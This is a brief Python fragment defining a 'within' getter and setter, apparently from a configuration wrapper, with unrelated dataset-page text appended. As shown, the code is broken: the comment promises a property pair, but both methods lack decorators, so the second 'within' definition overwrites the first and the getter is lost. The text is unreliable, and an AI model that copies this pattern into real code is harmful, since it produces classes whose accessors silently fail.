    # within getter (default: None) / setter pair.
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.